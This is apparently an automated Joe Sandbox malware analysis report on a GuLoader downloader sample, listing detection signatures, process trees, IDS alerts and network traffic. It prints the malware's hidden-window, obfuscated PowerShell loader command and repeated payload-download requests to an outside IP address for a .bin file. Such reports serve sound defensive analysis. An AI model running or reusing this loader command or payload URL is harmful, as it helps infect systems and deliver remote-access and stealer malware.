Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rArz0wnYVU.exe

Overview

General Information

Sample name:rArz0wnYVU.exe
renamed because original name is a hash value
Original sample name:0a2bf76a4014ebafcf6a15f5a3e7f8ea1e2e058b4c7efbfab930454fe9cf150d.exe
Analysis ID:1586025
MD5:2c5d3252b0c8ce91c28211e0ed75a1f5
SHA1:9ca8101bc26b8ea199c71fed4e3aa9279535ed58
SHA256:0a2bf76a4014ebafcf6a15f5a3e7f8ea1e2e058b4c7efbfab930454fe9cf150d
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • rArz0wnYVU.exe (PID: 2940 cmdline: "C:\Users\user\Desktop\rArz0wnYVU.exe" MD5: 2C5D3252B0C8CE91C28211E0ED75A1F5)
    • powershell.exe (PID: 4284 cmdline: powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 904 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.3883422466.000000000398C000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas), CommandLine: powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rArz0wnYVU.exe", ParentImage: C:\Users\user\Desktop\rArz0wnYVU.exe, ParentProcessId: 2940, ParentProcessName: rArz0wnYVU.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas), ProcessId: 4284, ProcessName: powershell.exe
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 212.162.149.94, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 904, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49792
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas), CommandLine: powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rArz0wnYVU.exe", ParentImage: C:\Users\user\Desktop\rArz0wnYVU.exe, ParentProcessId: 2940, ParentProcessName: rArz0wnYVU.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas), ProcessId: 4284, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-08T16:29:45.073616+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:29:55.205794+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:30:05.335139+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:30:15.471803+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:30:25.617263+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:30:35.763757+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:30:45.893758+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:30:56.036797+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:31:06.175243+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:31:16.315793+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:31:26.456822+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:31:36.597147+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:31:46.738458+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:31:56.990808+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:32:07.127948+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP
    2025-01-08T16:32:17.268549+010028032702Potentially Bad Traffic192.168.2.549792212.162.149.9480TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binAvira URL Cloud: Label: malware
    Source: rArz0wnYVU.exeReversingLabs: Detection: 23%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.3% probability
    Source: rArz0wnYVU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: rArz0wnYVU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49792 -> 212.162.149.94:80
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.94
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.94Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:29:47 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:29:57 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
